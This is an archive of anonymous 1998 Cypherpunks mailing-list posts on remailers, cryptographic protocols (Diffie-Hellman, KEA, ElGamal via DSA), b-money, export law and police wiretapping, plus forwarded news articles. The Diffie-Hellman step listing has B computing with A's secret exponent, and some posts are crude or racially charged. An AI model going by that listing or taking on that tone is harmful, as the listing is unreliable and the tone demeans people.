If the source code isn't available, don't trust it. That's a good general

@_date: 1998-12-05 13:14:50
@_author: Anonymous 
@_subject: the shit hitting the fan 
Moron.  At a low population density you can do anything, burn wood, leaded
etc., no problem.
LA has 1e7 people who shit about a kilo per day.  Compute the volume of that
after a week.

@_date: 1998-12-05 13:22:47
@_author: Anonymous 
@_subject: pgp disk 
At 03:05 AM 12/5/98 +0100, Anonymous wrote about some new product:
Where is the source for pgpfone?

@_date: 1998-12-06 01:56:17
@_author: Anonymous 
@_subject: .. 
Well, you shouldn't have complete trust -- a tamper-resistant net could be
compromised, too -- but there's a good reason to have more trust in it than in
the existing one. More on that after a parenthetical remark.
(This brings up the "hardware web-of-trust" issue; you can set up such a web
with trusted spot-checkers and statistical/cryptographic means of assuring the
user that the box works as advertised, if your threat model demands it.  There's more about it in the "Beyond Class (A1)" section of the Orange Book,
although the section's use to Cypherpunk types is limited because it's written
without any thought to, say, doing things cheaply or having a decentralized
The tamper-resistance simply means that if the mailer was set up secure, it's
not going to become compromised. Instead of having to trust that one of the
remailer operators is currently honest and has always done all the necessary
homework to ensure the system was safe, you have to trust that this entity was
honest and diligent when the remailer was set up (unless, of course, you think
the tamper-resistance was circumvented); if the operator is bribed after the
remailer's set up and the public key is published, there's no way to suddenly
and invisibly make messages traceable, as there is in a "normal" Mixmaster
(This is because, given the normal assumptions about crypto strength, it takes
the remailer's private key to process a Mixmaster-like packet and that key is
generated by and stays within the tamper-resistant box)
My predictions about the biggest attacks on a tamper-resistant remailer net:
  1: traffic analysis. Until the net structure is overhauled, this will always
     be possible.
  2: propagation and exploitation of faulty server software. Related to the
     whole web-of-trust issue.
  3: direct attacks on specific clients. Again, no web of trust.
  4: creation of bad remailers and attempts to shut down good ones. More
     messages could be traced in a world with 6 good and 47 bad remailers than
     in one with 9 good and 3 bad.
  5: direct attacks on new remailers
  6: attempts to make an operator feign a catastrophe and set up a new,
     compromised remailer. Users, however, would know that the new key not      signed by an old one means that they must now trust that the remailer was
     not compromised before the publication of the new key.
  7: attacks on tamper resistance
  n: attacks on crypto
n+1: etc.

@_date: 1998-12-06 04:37:12
@_author: Anonymous 
@_subject: No Subject 
Sorry for all the questions but I've been
away from crypto for a while and I'm
looking for the best encryption program
for exchanging email between Unix and
Windows folks. I hope these questions are
appropriate here.
What do people generally think about S/MIME ?
Is it well designed (strong and extendable) ?
Is it convenient because its available in
the popular email clients ?
Is the most annoying thing about it that
you have to pay for the keys ?
Is there a way to self-sign keys ? SSLeay ?
Are most people still using PGP ?
If IDEA and MD5 (and PGP2.6.2) are not strong
enough anymore, what are the Unix folks
using ? Does the source for PGP5/6 compile
to any target besides Windoze ?

@_date: 1998-12-06 08:11:43
@_author: Anonymous 
@_subject: the shit hitting the fan (fwd) 
You're correct. I had no clue that the Cypherpunks were such a shitty group.

@_date: 1998-12-06 11:03:46
@_author: Anonymous 
@_subject: ... 
This does not fully explain the protocols, but an explanation of RSA is
available at John Young's Cryptome.
Download it, though, because it was one of the files relating to Bill Payne
which will most likely be deleted when he gets his own web page up as promised.
Diffie-Hellman and NSA's Key Exchange Algorithm need no URLs --
Diffie-Hellman was designed by Whitfield Diffie and Martin Hellman, and its
publication sparked public-key cryptography (and received a standing ovation
when presented).
The Key Exchange Algorithm (KEA) is an NSA "type II" algorithm used in the
Defense Messaging System. It was kept classified until recently. Schneier
mentions in his CRYPTO-GRAM newsletter that problems with making
tamper-resistant hardware carrying the algorithm may have led to its release.
The devices are named A and B. Brackets represent a value's "owner."
Both: Retrieve public values g and p.
   A: Chooses a random secret value x[A].
      Calculates X[A]=g^x[A] mod p.
      Sends X[A] to B.
   B: Chooses a random secret value x[B].
      Calculates X[B]=g^x[A] mod p.
      Sends X[B] to A.
   A: Raises value received from B to the x[A] power and uses this to calculate
      the key.
   B: Raises value received from A to the x[B] power and uses this to calculate
      the key.
(this is a modified version of an old post to Cypherpunks)
p: 1024-bit prime modulus
q: 160-bit prime divisor of p-1
g: 1024-bit base
Secret user-dependent values:
x: 160-bit random key
r: 160-bit random key
Public user-dependent values:
Y: g^x mod p
R: g^r mod p
z(x, y) represents KEA threshing.
1  A->B: Y[a]
2  B->A: Y[b]
3  A->B: R[a]
4  B->A: R[b]
5  A   : (Y[b])^q mod p = 1? If not, stop; (R[b])^q mod p = 1? If not, stop;
         Are Y[b] and R[b] between 1 and p? If not, stop.
6  B   : (Y[a])^q mod p = 1? If not, stop; (R[a])^q mod p = 1? If not, stop;
         Are Y[a] and R[a] between 1 and p? If not, stop.
7  A   : t[ab]=(Y[b])^r[a] mod p; u[ab]=(R[b])^x[a] mod p
8  B   : t[ab]=(R[a])^x[b] mod p; u[ab]=(Y[a])^r[b] mod p
9  A   : (t[ab]+u[ab]) mod p = 0? If so, stop; if not, Key=z(t[ab],u[ab])
10 B   : (t[ab]+u[ab]) mod p = 0? If so, stop; if not, Key=z(t[ab],u[ab])
Zero-Knowledge Protocols:
RSA Data Security's RSA Labs on protocols:

@_date: 1998-12-06 16:21:34
@_author: Anonymous 
@_subject: PGP Disk 
Make sure you get the latest version.  The version released in May or
June had a bug in it (bug was only in the Windows version, the Mac is OK).
The new version re-encrypts old PGP disks to fix the problem.

@_date: 1998-12-07 05:57:44
@_author: Anonymous 
@_subject: Crypto deterrents 
White men traded as 'sex slaves' of black prisoners
By Fergal Keane, in Illinois
WHITE male prisoners in American jails are being "sold as sex slaves" by
black fellow inmates for money, tobacco, drugs and alcohol, according to
campaigners who are urging action to end widespread homosexual rape
behind bars.
Damaging claims of complicity by prison guards are also emerging. Five
wardens at a Californian maximum security jail are facing charges
relating to the rape of an inmate by a notorious sexual predator. The
wardens allegedly forced a troublesome prisoner to share a cell with a
black gang leader, who was rewarded with extra food and clothes for
imposing "discipline" on the man.
According to the campaigners, the sex attacks often carry ugly racial
overtones, with many white prisoners claiming that they were sexually
abused after being placed in cells with black inmates. Most victims are
too scared to complain, it is claimed, and those that do say they have
been ignored by the authorities. The scale of the scandal has been
uncovered by the pressure group Human Rights Watch, which next year will
publish a report documenting the "staggering prevalence" of prison rape.
The situation is not just provoking concern among civil liberties
groups. In the state of Illinois, a prominent conservative figure,
Republican legislator Cal Skinner, is also pushing for tougher
government action. He claims that many of the rape victims have been
infected with the HIV virus and that American prisons are becoming a
breeding ground for Aids.
Mr Skinner said: "There are sexual slaves in too many prisons. People
are being given a death sentence." He wants to see the mandatory Aids
testing of all prisoners with the segregation of those found to be HIV
positive. He believes it is one of the few ways of protecting vulnerable
inmates from the potentially fatal effect of prison rape.
The renewed concern over rape in prisons has come too late for Michael
Blucker, 29, a white man from Crystal Lake in Illinois, who was
repeatedly gang-raped while serving a sentence for burglary. Blucker's
ordeal is almost too horrific to contemplate: he was forced to become a
sex slave to black prisoners at Menard State Penitentiary in Illinois.
Prison rape is not confined to white victims but they are particularly
vulnerable as black gang members make up such a large part of the
American prison population.
Blucker said: "I was the only white man in a gallery [wing] of more than
100 prisoners. Most of the guys were in for very serious crimes; they
were people who weren't going to be getting out of there any time in the
next 30 years." The first attack came when Blucker had been in jail just
two weeks. He was set upon by three black prisoners, stripped, beaten
and raped.
"They would have killed me if I had refused. Killing means nothing to
these people," he said. Once it became known that he had been raped,
Blucker's life became even more of a nightmare. In the violent world of
American prisons, an inmate who "allows" himself to be raped is regarded
as fair game for every other inmate and is used as a sex slave, normally
under the direction of a senior gang leader.
In Blucker's case, one of the black prisoners sold him to other inmates
on a daily basis. "He would physically threaten me and threaten to have
harm done to my wife outside prison. Every day, I would be sold as a sex
object while he was given money and cigarettes and marijuana and alcohol
in return." When the threats of violence did not cow Blucker, his
tormentor would beat him into submission.
While filming in Butner prison in North Carolina, I met Ivory Rhodes, a
black prisoner, who was attacked within days of being placed in the cell
of a known rapist. The pattern he described was almost exactly the same
as that experienced by Blucker. A violent attack and the threat of death
followed by brutal rape. Rhodes's solution was to try to spend long
periods in solitary confinement, a deprivation he preferred to risking
his life in the main cells.
Rhodes managed to avoid being raped again, but whenever he was
transferred from one prison to another, the stigma of "rape victim" went
with him. After his rape, Rhodes never moved out of his cell without
carrying a knife. He described a world in which any weakness is preyed
upon by the tougher and older inmates. The young, the first-time
offenders, the middle class are especially vulnerable to attack.
Blucker said: "There are people who say that if somebody attacked them
in prison they would kill themselves or kill other people. That is bull.
It just doesn't happen that way."
What was almost certainly his worst experience occurred in the showers
when he was set upon by a large gang of prisoners. "They pulled bricks
out of the wall and they hit me in the nose and the eye and then on the
back of the head, which knocked me out." Then he was repeatedly raped.
"I couldn't tell you if it was one, three, 10 or 15 people. All I know
is that I felt very unwell."
At first, Blucker said, he was too frightened to report the rapes for
fear of being killed by the other inmates, but after the shower incident
he spoke to prison officials. The result, he claimed, was indifference.
"I spoke to officers and medical people and no one believed me."
Blucker subsequently took a court action against several prison guards
and the prison psychiatrist but was unable to prove his claims. What is
not disputed is that he needed extensive surgery for injuries sustained
in the attack and that while in prison he contracted the HIV virus.
Blucker was eventually transferred from Menard after lobbying a local
politician. Now a free man, he is looking for a job and is actively
involved in his church. God, he says, will save him from Aids.
Fergal Keane is a BBC Special Correspondent

@_date: 1998-12-08 08:33:24
@_author: Anonymous 
@_subject: Wiretap Operation Sheds Light on LAPD Tactics 
If it is Monday, December 7, 1998, you can go to
 and read about how
Los Angeles police wiretapped a small cellular phone service provider
because his policies were too helpful for drug dealers.  He didn't try
hard enough to verify customer names, he sold cell phones with built in
scramblers, he allowed customers to change phones and numbers easily.
After years of investigation the company owners were never charged,
but a number of their customers were convicted as drug dealers, in many
cases never being told about the phone taps.
It's an ominous account of how privacy-friendly policies can be used by
the police to justify an investigation.
If it's after December 7, read the story here:
:      Los Angeles narcotics officers spent a lot of time spying on John
: Lopez and his small storefront telephone company--Atel Cellular
:      Convinced he was in cahoots with drug dealers by selling secure,
: cop-proof phone service--no questions asked--they staked out his
: Downey office, tailed his customers and finally wiretapped the
: customers' and Atel's phones.
:      Starting with just his business lines and a handful of customers,
: the operation spread like kudzu, eventually covering hundreds of
: phones and thousands of conversations and becoming the largest wiretap
: operation in the history of Los Angeles County.
:      When the three-year probe ended in March, police had arrested
: dozens of Atel's customers, but not Lopez or any of his employees.
:      The Atel taps are at the center of the nine-month legal
: controversy over whether prosecutors have been improperly concealing
: their wiretapping operation and the information derived from it. Also
: at issue are charges by defense lawyers representing Atel customers
: that the allegations against Atel Cellular are a sham created to win
: court orders permitting an electronic fishing expedition against their
: clients.
:      Manager Lopez and Atel's owner, Atil Nath, refused to
: comment. Their lawyers say the two men are not involved in drugs.
:      "The whole concept [of the police wiretap operation] was
: preposterous," said Dale Hardeman, a Downey attorney. "How are we
: supposed to know if customers are involved in criminal activity?"
:      Details of the probe--revealed through interviews, police
: affidavits, wire monitor logs and volumes of court records--provide a
: fascinating inside look at how detectives can mold the legal actions
: of a suspect into criminal scenarios and persuade judges to authorize
: snooping on people's private conversations.
:      The probe also raises broader questions, such as whether many of
: the reasons given for tapping Atel could just as easily be applied to
: other phone companies, and whether wiretaps should be allowed to
: continue indefinitely, even when police work for months without
: finding enough evidence to arrest the target.
:      The 4th Amendment protects phone privacy.
: :      Need for Probable Cause
: :      To tap a phone, prosecutors have to get a court order by showing
: they have sufficient reason, known as probable cause, to believe the
: phone subscriber is committing crimes. Even if a subscriber's actions
: are legal when considered individually, those actions can amount to
: probable cause when viewed as part of a larger picture.
:      If a tap provides a lead or evidence, prosecutors must reveal the
: tap and give transcripts to the defendant before trial.
:      Though the Atel investigation established strong suspicion among
: investigators that Lopez knew he was dealing with drug traffickers, it
: fell far short of proving it.  But police were getting a steady supply
: of leads against his customers as well as new phone numbers of people
: they considered suspicious. So they kept going back to court for
: extensions and new taps.
:      Police referred all questions about the case to prosecutors, who
: defend the wiretap practice, saying they had sufficient evidence to
: suspect Lopez of wrongdoing.
:      Dist. Atty. Gil Garcetti noted in a prepared statement that the
: operation had court approval. He said police targeted Atel because
: they believed most of its business was providing phones to drug
: dealers without requiring them to provide any personal information.
:      Superior Court Judge John Ouderkirk, who approved most of the
: orders, said he could not discuss pending cases.
:      Not much is known about Lopez and Nath. Nath lives in a two-story
: home in a neat, well-kept neighborhood in Downey. Lopez lives in Pico
: Rivera with his wife, Maria, and their children. Both have said in
: court papers that they have no criminal record. Their company is one
: of about three dozen small phone companies in Los Angeles County that
: resell or sublease service and equipment.
:      Police say the closest they came to showing a direct connection
: between Lopez and drugs was during a stakeout at his home when they
: saw a man arrive in a pickup truck registered to a member of what they
: say is a drug gang.
:      The investigation grew out of, and, in many ways, was modeled
: after a 1994 wiretap of Downey Communications, another small retailer
: of phone services. As in the Atel probe, police staked out the
: business and collected information for wiretap orders.
:      During hours of surveillance, they watched customers arrive and
: leave. They noticed the types of vehicles they drove. They even took
: notes on their manner of dress, eventually deciding that silk floral
: shirts, pressed denim, hand-stitched leather belts and expensive
: cowboys boots were haute couture on the L.A. drug scene.
:      Police claimed that Downey leased to drug dealers and was
: "heavily involved in the sale and transportation of narcotics."
: Officers would later use the same language in Atel affidavits.
:      The Downey wiretaps lasted a year. They ended in drug and cash
: seizures and 12 indictments, including one against the brother of
: Downey's owner. But the owners and employees of Downey were not
: arrested. The owner said in court papers he was never interviewed by
: police, was not aware of the investigation and has never been charged
: with a crime.
:      Police used the Downey Communications probe as a springboard to
: Atel.
:      The connection was tenuous.  Downey and Atel customers shared the
: same taste in cars and fashion.  Downey employees were seen paying
: short visits to Delta Tri-Telesis, a now-defunct cellular phone
: business owned by Nath and operated by Lopez.
:      So in September 1995, officers turned their binoculars on Atel,
: which had taken Delta's customers.  They often saw customers in cars
: registered to targets of previous drug probes going to houses once
: used as drug "stash" sites and employing what police considered
: "counter-surveillance" driving.
: :      Reports on Surveillance
: :      Investigators say they saw Lopez use such techniques when they
: were tailing him in May 1996, shortly before they started tapping his
: business phones. They said they saw him on the freeway changing lanes
: erratically and driving "at a high rate of speed in excess of 70 miles
: per hour," later making a U-turn on Arrington Avenue and lingering too
: long--three minutes--at an intersection.
:      Police also noted in affidavits that Lopez sold money counters
: and phone scramblers; that he apparently didn't care if customers gave
: him fictitious names; that he let customers change numbers quickly and
: easily.
:      Drug suspects were frequently found with Atel phones.
:      Police saw what they considered suspicious calling patterns--too
: many calls in a short period of time--among groups of Atel customers.
:      Although such evidence was far from enough to file charges
: against Lopez and Nath, legal experts say it was sufficient as
: probable cause for a court order, which was granted in May 1996 for 30
: days.
:      After a month of wiretapping, Garcetti's prosecutors--armed with
: transcripts of tapped phone conversations--were back in court asking
: for the first extension of the court order and for permission to tap
: new telephone numbers. From then on, requests for extensions built on
: previous ones. Police eventually received 19 extensions.
:      Although the taps provided a mother lode of leads against drug
: dealers, they seldom offered much evidence against Atel. There was one
: conversation that police described in an affidavit as particularly
: damning for Lopez. It was on June 25, 1996, from "Oscar," who had been
: under police surveillance.
:      "Hey John, this number is no good," Oscar tells Lopez.
:      Lopez: Not good?
:      Oscar: They're on me again!  Right behind.
:      Lopez: OK, bring it in now!
:      But most of Lopez's conversations in the affidavits simply
: confirmed what police already knew: that customers dealt directly with
: Lopez, that Lopez based billing records on phone numbers instead of
: names and that he handled billing arrangements by phone.
:      In contrast, the conversations among customers were
: fruitful. Most were cryptic discussions about drug deals, pickup
: locations, delivery times, police said. According to investigators,
: they never mentioned drugs, using words such as "ladies," "stuff" or
: simply a number understood to be an amount of drugs.
:      For example, in June 1996, police overheard this exchange:
:      Receiver: How do they look?
:      Caller: Real good. How many do you have?
:      Receiver: 40 plus 5 out, plus some lying around.
:      Caller: OK. I'll hold whatever else I have.
:      Without interpretation by detectives, there is little indication
: that that conversation is about drugs.
:      By the time the operation ended in March, police had tapped close
: to 400 Atel phones.
:      The wiretap controversy erupted that month because San Diego
: attorney Philip DeMassa and two other lawyers discovered that the case
: against their clients sprang from information garnered from the Atel
: taps and handed off to other officers who were not told of the taps so
: they would not have to reveal them to defense lawyers.  Later, Deputy
: Public Defender Kathy Quant went to court for indigent defendants.
:      Garcetti acknowledged in June that he withheld tap information in
: 58 cases and he agreed to notify defendants about future taps.
: Although a judge upheld the wiretap handoff practice last month, with
: some qualifications, Quant is considering an appeal. Other defense
: lawyers are challenging whether Garcetti has revealed all tap cases.
:      Whatever the outcome, the probe clearly helped police arrest some
: of Atel's customers. It netted large amounts of narcotics, about $8
: million in drug proceeds and dozens of arrests.
:      Lawyers base their doubts about the investigation of Nath and
: Lopez partially on the fact that it lasted three years and police
: never tried to interview them. In fact, DeMassa alleges in court
: papers that Lopez and Nath are actually police informants or are
: perhaps cooperating through a grant of immunity from prosecution, an
: assertion prosecutors call absurd.
:      DeMassa is hoping to show that police misled the courts when they
: said they were investigating Lopez and Nath.
:      If Nath and Lopez were such an integral part of a gigantic drug
: trafficking operation, the police should be trying to protect the
: public from them, he said.
:      "Why isn't anything happening to these guys?" he said.
: :      Acts Were Not Illegal, Critics Say
: :      None of Atel's acts described in the affidavits was illegal,
: Quant and other critics say.  Well-known phone companies engage in
: many of the same practices, Quant said. If police use the same
: standards elsewhere, any companies, especially small retailers, may be
: vulnerable to taps.
:      Many of the actions cited in Atel affidavits are suspicious only
: in the eyes of police, Quant said.  Money counters are legitimate, and
: other firms advertise "no eavesdropping" cell phones because
: legitimate businesses need secure communications, she said.
:      There is nothing suspicious, for example, about high usage of
: cell phones, particularly among real estate agents, salespeople, even
: news reporters, Quant said.  And other small retailers allow people to
: change numbers frequently.
:      Regardless of Atel's guilt or innocence, what police did to Atel
: could be done to any legitimate businesses, she said.
:      Deputy Dist. Atty. Robert Schirn dismissed that notion.
:      "That's quite a stretch," he said.
:      "Atel was a facilitator and made it possible for drug dealers to
: break the law," he said.
:      Yet Schirn acknowledged that he could not point to any conclusive
: evidence that Nath and Lopez knew that some of their customers were
: drug dealers.
:      He said he didn't know if police tried to persuade defendants to
: testify against Nath or Lopez.  Even if they did, prosecutors would
: need more evidence than the tainted testimony of accomplices to make
: an arrest, he said.
:      As for Atel, Hardeman said his clients had no idea some of their
: customers were criminals.
:      "This investigation has virtually destroyed them," he said.

@_date: 1998-12-08 09:41:41
@_author: Anonymous 
@_subject: (fwd) Markus Kuhn on eternity 
It would seem that it is the provider of the content, not the filterer,
who is subject to legal authority.  If I set up an open FTP site and
allow anyone to post anything there, I can be legally forced to shut
down once copyrighted software and child pornography appear.  It has
nothing to do with my filtering, it is my providing of the material that
is objectionable.
The Eternity concept has always been vague about exactly who is anonymous.
There are many parties involved: the ones who submit material to the
Eternity service; the ones who decide what material will go onto the
service; the ones who own and maintain the machines which hold the
material; the ones who receive requests for the material and supply it
in response; the ones who request material and receive it.
We need a more careful analysis of Eternity in terms of what levels of
anonymity are possible and necessary for each of these roles.

@_date: 1998-12-08 13:44:28
@_author: Anonymous 
@_subject: DSA for encryption 
Good idea!
It may not be so easy to get people to set up port-forwarding programs.
These could be a target for hackers seeking to cover their tracks as they
try break-ins.  Also, how many people in this day of commercial ISPs are
able to set up port-forwarding programs?
It would seem more promising to make your web page script be simple
and portable enough that even users of AOL and free webpage hosts like
GeoCities would be able to install it.
DSA per se is probably not your best choice - unless you already have a
DSA implementation which you want to try to use.  DSA is a signature
algorithm, and while it is sometimes possible to use a DSA implementation
to do encryption, it is not particularly convenient.
What you want to do is to use the mathematical principle behind DSA, which
is the difficulty of solving the discrete log problem, and use an encryption
algorithm which relies on that same math problem, namely Diffie-Hellman or
ElGamal encryption.
If you need to use DSA, Bruce Schneier describes in his book Applied
Cryptography how to get the effect of ElGamal encryption.  Here is what
he writes, on page 490:
: ElGamal Encryption with DSA
: : There have been allegations that the government likes the DSA because it is
: only a digital signature algorithm and can't be used for encryption.  It is,
: however, possible to use the DSA function call to do ElGamal encryption.
: : Assume that the DSA algorithm is implemented with a single function call:
: :     DSAsign (p, q, g, k, x, h, r, s)
: : You supply the numbers p, q, g, k, x, and h, and the function returns the
: signature parameters: r and s.
: : To do ElGamal encryption of message m with public key y, choose a random
: number k, and call
: :     DSAsign (p, p, g, k, 0, 0, r, s)
: : The value of r returned is a in the ElGamal scheme.  Throw s away.  Then,
: call
: :     DSAsign (p, p, y, k, 0, 0, r, s)
: : Rename the value of r to be u; throw s away.  Call
: :     DSAsign (p, p, m, 1, u, 0, r, s)
: : Throw r away.  The value of s returned is b in the ElGamal scheme.  You now
: have the ciphertext, a and b.
: : Decryption is just as easy.  Using secret key x, and ciphertext messages
: a and b, call
: :     DSAsign (p, p, a, x, 0, 0, r, s)
: : The value r is a^x mod p.  Call that e.  Then call
: :     DSAsign (p, p, 1, e, b, 0, r, s)
: : The value s is the plaintext message, m.
: : This method will not work with all implementations of DSA.  Some may fix
: the value sof p and q, or the lengths of some of the other parameters.
: Still, if the implementation is general enough, this is a way to encrypt
: using nothing more than digital signature function.
If you need more information about what the various values mean, or how
to create a DSA and/or ElGamal key, just ask.
Really, ElGamal is simple enough that if you have access to a large-number
math package, writing your own is probably easier than trying to get DSA
to do it.  It is unlikely that you will find a DSA implementation which
allows you to specify all the needed parameters above, particularly h
and k.  Usually h is forgotten after key generation and not used during
signature, and implementions will probably want to choose k themselves
since it is a very sensitive parameter.

@_date: 1998-12-09 04:50:44
@_author: Anonymous 
@_subject: The problem with 'Gilmore's RSAREF' site... 
What about the Martinez case?  She was convicted of exporting a
satellite TV descrambler because of its crypto hardware.
Charles Booher is still facing possible prosecution for putting his
SecureOffice program on his website.  His Grand Jury hearing for possible
indictment has been postponed, at last report.  Can we be sure that he
won't be indicted?

@_date: 1998-12-09 07:02:34
@_author: Anonymous 
@_subject: Altavista hacked 
It appears that  has been hacked.
Begin Quote:
If you are looking for pornographic material (naked people)
                             please Click Here          Else please check back with us soon, we are under
                                construction. Thanks. End Quote
Resolving *.digital.com DNS entries seems impossible. Any ideas? Wish
DNSsec was deployed, it might of prevented this.

@_date: 1998-12-09 09:45:43
@_author: Anonymous 
@_subject: Wei Dei's "b-money" protocol 
x at x.com asks about Wei Dei's b-money proposal:
The description is intended to show how money is transferred, and how it
is created.  These are technically difficult issues when dealing with
electronic money, and that is what the proposal addresses.
It is not anticipated that most people will make money by using their
computing power.  That feature is only used when the money supply needs
to expand, because of increased economic activity.
Instead, people will generally get money the same way they do today:
someone will give it to them, either as a gift or as payment.  You are
free to give your money to whomever you want to, and you are free to
offer your goods and services in exchange for money.  Such exchanges
of money should be much greater in volume than the amount of new money
which is created by burning computer cycles.

@_date: 1998-12-09 21:47:07
@_author: Anonymous 
@_subject: No Subject 
I think setting up mirror sites of crypto archives across the world is a great idea.  However, I also think we need to focus on getting more and more people to use crypto.  I would guess that the vast majority of computer users worldwide see no use for encryption in their day-to-day lives -- and even those that do don't also use it.
If everybody in the world is using encryption, it is going to be extremely difficult for "democratic" governments to tell them they can't use it any more.
Unfortunately, it's easy for governments to blame crypto for terrorism and a host of other crimes, simply because the average citizen doesn't understand the concept of an "electronic envelope".

@_date: 1998-12-10 15:06:27
@_author: Anonymous 
@_subject: Wassenaar summary (and a funny new loophole) 
Are items freely exportable between countrys that are party to this agreement?

@_date: 1998-12-10 15:38:58
@_author: Anonymous 
@_subject: riots cancelled on account of weather.. 
Too cold and rainy.  You need a summer outage for true fun.

@_date: 1998-12-11 01:52:34
@_author: Anonymous 
@_subject: unknown_subject 
So you'd be happy to staple a check or money order for a bill to a
postcard and send it off?  Are you trying to be obtuse, or is it
just a natural phenomenon with you?

@_date: 1998-12-12 02:44:28
@_author: Anonymous 
@_subject: alternative b-money creation 
Bill Stewart writes, regarding Wei Dai's b-money protocol:
B-money is not fiat money.  It is better to think of it as commodity
money.  Unlike most commodity money, in this case the commodity is not
intrinsically valuable.  However it is scarce, and more can be created
only at a considerable cost.  An analogy might be money based on a rare
earth element like Terbium (which, let's suppose, has no industrial uses).
Terbium based money would be immune to inflation, like gold backed money,
but the element is not valuable in itself; it is only valuable for its
role as money.
This leads to an important difference between b-money and fiat money.
The value of b-money is not set by fiat.  The value is determined
automatically by the workings of the market and the workings of the
There is no centralized agency to make b-money legal tender, or to set
its value in terms of other currencies.  Most importantly, there is no
agency which can issue new b-money, inflating and devaluing the currency.
Money is a store of value and a medium of exchange.  B-money is admirably
suited for these purposes, much better than fiat money.  The quantity of
b-money in a mature system is, roughly speaking, constant.  (The quantity
may grow, but it will do so slowly, based on the increased demand for
b-money.)  B-money is an investment which will hold its value.  Because
it can be exchanged electronically, it is much more flexible as a medium
of exchange than existing forms of money.
Think of this CPU-burning as the effort to mint or mine new b-money.
Like other commodity based money, and unlike fiat money, b-money cannot
be printed.  New b-money can only be added to the money supply by virtue
of expending work.  This is what insures that there is no inflation.
You could say the same thing about gold mining, in the days when gold
was money.  Most gold went into circulation as coins, not adding beauty
or value to the economy.  Its only utility was as an increase in the money
But, of course, adding to the money supply is an important contribution.
To have a stable commodity money, it must be costly to create more,
and the cost must be "wasteful" in the sense that it is not compensated
other than by the monetary value of the newly produced money.  Otherwise
you will get excessive inflation.
It's ironic for people to complain that b-money is inferior, in a world
in which fiat money is universal.  Once the mathematics of b-money are
better established and understood, and once the technical issues are
clarified and problems solved, this appears to be a very attractive
alternative to fiat money.  Unlike commodities such as gold, it can be
easily exchanged electronically.  And unlike fiat money, it is immune
to attempts to manipulate the money supply.
B-money could easily attract investment as an inflation-proof store of
value.  This may be enough to initiate the bootstrapping process.  People
can buy b-money as a store of value, and once they hold it they will want
to be able to spend it.  This will lead to a demand for merchants to
accept it, and the process has begun.

@_date: 1998-12-12 16:23:10
@_author: Anonymous 
@_subject: Postcard Debates 
postcard not private?  nobody reads them?  just
this last week click and clack (you know, the car
guys on NPR) received a $20 bill in the mail.  no
envelope - just a $20 bill with a stamp and their
address written on the face.  amazing but true. - real audio required.

@_date: 1998-12-13 10:21:24
@_author: Anonymous 
@_subject: Mathematician-to-silicon compilers and the Law 
1. In the *best-case*, the published paper transmits some knowledge to the
reader :-)
2. In ECAD, tools try to go from that published Paper to circuits.  In SoftE, tools try to go from english specs to runnable prototypes. Meanwhile, the humans who do various steps of this translation
get paid reasonably well.
2. But eventually normal english prose will be *mechanically translatable*
to a machine-ready format.  Which means that free speech law starts mixing with machine law (patents, export restrictions, posession
Because the Instructions become the Thing.
You can sell instructions on converting your rifle to full auto, or
stealing cable TV.  They're protected speech.   But suppose you could feed
a properly formatted blueprint into a universal fabricator and get a full
auto rifle out?
Crypto source code fed to a universal computer gives you a regulated item;
what  happens to the law when regular english is just a few clicks away
from being an executable?  A chip?
There is a fundamental issue that the law doesn't handle at all consistently,
because it previously didn't matter much, but which every CS Ugrad knows: There is no difference between software, and hardware. Only such annoyances
as cost, development time, throughput, flexibility, etc. (Not everyone can see machines as instantiations of ideas.  Politicians
have particular problems linking abstractions to atoms.  Fortunately, those
can see machines as ideas can turn their ideas into machines.)
I see two extrapolated futures.  In one, the end result is restrictions on
free speech in certain areas (e.g., crypto), for the benefit of national
insecurity and the Children.  In the other, the Law will have to allow you
whatever posessions you like, and only punish *actions* after the fact.
Given recent historical trends...
Imagine biologists couldn't publish new enkephalin sequences because
someone might put them into a programmable yeast and make unlicensed

@_date: 1998-12-13 13:06:03
@_author: Anonymous 
@_subject: steganography detection hazard? 
Suppose you take your plaintext, encrypt it,
then spread the bits across an image as the LSBs.
The LSBs will, if you've used a decent cipher, have perfectly uniform distribution.
The 'noise' LSBs in a chunk of *digitized* bits will show
a *uniform* distribution.  (As indeed will the cipher's blocks,
or any bitchunk larger or smaller.)
Therefore an entropy test (see Maurer) will discriminate
between the two.
Please prove me wrong.

@_date: 1998-12-15 03:29:41
@_author: Anonymous 
@_subject: COMMENT: Minimum Security Devices and Procedures and Bank Secrecy 
Today I called the manager of the branch where I have account (for many years)
and asked him about "Know your customer" thingy and reporting that they
currently do. He seemed knowledgable to a certain extent about this matter,
and assured me that today they report only the $10K+ cash transactions. Then
I told him that I will take my business elsewhere should they decide to
offer "know your customer" service to the government and asked him nicely
to relay my stand to his manager.
Call them. These people make living from your money.

@_date: 1998-12-15 08:41:40
@_author: Anonymous 
@_subject: .... 
In either case, you need to be sure that changed data is always encrypted with
different parameters -- that is, a changed file should be encrypted with a new
IV or different offset into S1 and S2. Otherwise, the attacks used to recover
badly wiped information could be used to look back in time, so to speak, and
figure out which portions of the file were changed. It's more of a problem if
you're using ofb o ecb o ofb (i.e., the CFS mode) than an interleaved CBC mode.
The 8-way interleaved CBC mode should have different IVs for each "lane" (that
is, a monster 512-bit IV) -- otherwise, files data types with repetitions in
the headers could be identified. The IV should be secret to completely rule out
leakage. However, there are some important restrictions on how you can use the
key in making an IV -- I suggest something like this to ensure nothing is
messed up: hash the passphrase into K0, use nDES-OFB with K0 to make a K1 and
K2, then nDES-OFB with K1 for making the IVs which nDES-interleaved-CBC uses
with K2 for the actual encryption.

@_date: 1998-12-16 07:47:10
@_author: Anonymous 
@_subject: ARMCHAIR Commando List(Cypherpunks@cyberpass.net) 
"I CANT PARTICIPATE IN THE REVOLUTION BECAUSE I DIDNT
  GET ENOUGH NOTICE OR ITS TOO INCONVENIENT OR THEY
  ARE USING LEFTIST PROTEST TECHNIQUES"
  EXPORTING PGP WITHIN MINUTES OF ITS RELEASE
  NOW THAT WOULD IMPRESS ME...
  (BEEN THERE DONE THAT!)
   NOW I am trying to shake the apathy from all of you..
   Its so much easier to talk about revolution than
   participating or contributing...
   Talking about revolution does NOT make it happen
   magically..
   I suspect the revolution will die given the above
   anon

@_date: 1998-12-16 14:35:45
@_author: Anonymous 
@_subject: DoS considered harmful [WAS: RE: Anyone striking?] 
Hmm... I agree that Peter's representation of my suggestion would not be a
good idea nor would it be productive-- especially in the long run.  And his
interpretation of my writing was correct given the current understanding of
what a DoS is.  So let me flesh out a bit what I think option c) above
should have said.
In my first mail to the list on the strike subject I offered a couple
references outlining some possible forms of electronic civil disobedience
(ECD).  The analogy used in those texts is to a "sit in" or, as explained in
